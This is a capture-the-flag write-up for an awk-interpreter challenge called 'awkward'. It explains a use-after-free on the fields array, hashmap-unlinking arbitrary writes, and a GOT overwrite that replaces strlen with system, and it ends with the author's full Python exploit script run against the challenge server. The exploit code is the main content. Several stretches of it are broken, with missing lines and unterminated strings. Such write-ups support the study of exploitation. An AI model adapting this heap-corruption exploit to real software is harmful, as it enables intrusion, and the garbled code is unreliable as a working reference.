 code = 's = "he[";\n'
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 for i in range(31, -1, -1):
     code += 'if (x >= ' + str(1<<i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1<<i) + '; }\n'
 code += 's = s "]";\n'
 code += 'print "hello" ~ s;\n'

So, this is enough to free the fields array, but I needed to turn it into an arbitrary write. I chose to use the linked list removal operation of the variable hashmap for this (a super awkward technique, as you’ll see).

Screen Shot 2016-04-18 at 9.56.48 PM.png

Once the fields-array was freed, I declared a new variable to reallocate the variables hashmap into the freed memory (and I declared enough variables earlier to make sure that this would cross the 70% threshold on line 61).

Because I could leak the address of arbitrary string data I could construct some very complex structures in memory. I used this to create a fake hashmap_entry structure, with the name pointing to a real name string. I inserted this structure in the correct slot in the hashmap by writing into the fields array, then declared a real variable with the same name, running the unlinking code in the listing above.

I wanted to use the code on line 38 write to an arbitrary address, but unfortunately the “next” address had to be a valid address as well. To solve this I leaked the address of a large string in memory, and chose offsets into the string to control the low byte of the address. This allowed an arbitrary pointer to be written by repeating the “unlinking” primitive four times (increasing the write address each time).

I used the printf leak to leak the address of strlen from the GOT then added an offset to find the address of system (since my local libc was the same), and used the unlinking technique to replace the value. strlen was used by printf when printing strings, so after corruption I could get the flag by writing:

 printf "%s\n", "cat flag\n"; 

Full Code

The full code for my exploit (in all of its hasty awkward messiness) is listed below. It has a few more tricks that hopefully don’t need too much explanation. I’m afraid I used a rather inappropriate variable name (after 20 hours of hitting my head against this problem I was a bit frustrated), and then hardcoded the hash value making it too error-prone to change after the fact. Sorry.

import socket
import struct
import random
import string
import time
import sys

ADDRESS = ('', 10241)
ADDRESS = ('awkward.pwning.xxx', 2323)

sock = socket.create_connection(ADDRESS)
def read_byte():
    buf = sock.recv(1)
    if not buf:
        raise EOFError
    return buf

def read_n(n):
    s = ''.join(read_byte() for i in range(n))
    if VERBOSE:
        print '<', `s`
    return s

def read_until(sentinel='\n'):
    s = ''
    while not s.endswith(sentinel):
        b = read_byte()
        if VERBOSE:
            if b == '\n':
        s += b
    return s

def send(s):
    if VERBOSE:
        print '>', `s`

program = '''
    FS = "xyz";
    if ( $1 == "r" ) { printf ">>>%s<<<\n", 0 + $2; }
    if ( $1 == "a" ) { printf ">>>%d<<<\n", $2; }
    if ( $1 == "s" ) { saved0 = $2; saved1 = $3; saved2 = $4; saved3 = $5; }
    if ( $1 == "l" )
for i in range(5):
    program += "padding%d = \"0\";" % i;
program += '''
        str = "aaaabbbbccccddddeeeeffffgggghhhh";
        str; q = z;
        str; r = z;
        str; s = z;
        str; t = z;
        $128 = "1";
        str; u = z;

        print q;
        printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
        printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;

        x = t + 112;
        #x = 305419896;
        printf "freeing %x\n", x;

        s = "he[";
lookup = [0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) + [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8)
for i in range(31, -1, -1):
    program += 'if (x >= ' + str(1 << i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1 << i) + '; }\n'
program += '''
        s = s "]";
        print x;
        print s;
        print "hello" ~ s;
        realloc = 1;
        $50 = saved0;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved1;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved2;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved3;
        print "alive";
        fuck = 1;
        print "alive?";

        printf "%s\n", "cat flag\n"; 
        print "alive??";

#0xf75cb180 <system
#0xf7607690 <strlen


def read_address_string(a):
    send("rxyz%d\n" % (a,))
    return read_until('<<<')[:-3]

def get_address_of_string(a):
    assert ' ' not in a and '\n' not in a
    send("axyz%s\n" % (a,))
    return int(read_until('<<<')[:-3])

def read_at_least(a, n):
    r = ''
    while len(r) < n:
        r += read_address_string(a + len(r)) + '\0'
    return r

def read_dword(a):
    return struct.unpack_from('I', read_at_least(a, 4))[0]

strlen_got = 0x8052040
strlen = read_dword(strlen_got)

system = strlen + (0xf759b180-0xf75e13c0)
print hex(strlen)

junk_string = 'a' * 1024

scratch_start = get_address_of_string(junk_string)

name = get_address_of_string('fuck')
def generate_block(write_to, byte):
    target = (scratch_start + 256) & ~0xFF
    next_in_chain = prev_in_chain = next_ = prev = cache = target + byte
    type_ = 0x41414141
    value = 0x41414141

    next_offset = 0x8
    prev = write_to - next_offset

    print map(hex, (next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache))
    return struct.pack('IIIIIIII', next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache);

def do_hash(name):
    h = 0
    for i in name:
        h = ord(i) + 1337 * h
    return h

def save(a,b,c,d):
    for s in (a,b,c,d):
        assert '\n' not in s, `s`
        assert 'xyz' not in s, `s`
        assert '\0' not in s, `s`
    send("sxyz%sxyz%sxyz%sxyz%s\n" % (a,b,c,d))

print do_hash('fuck') % 64

    generate_block(strlen_got, (system & 0xFF)),
    generate_block(strlen_got+1, ((system >> 8) & 0xFF)),
    generate_block(strlen_got+2, ((system >> 16) & 0xFF)),
    generate_block(strlen_got+3, ((system >> 24) & 0xFF)),
raw_input('attach?') # ps aux | grep ' ./awkw' | grep -v grep | cut -c10-15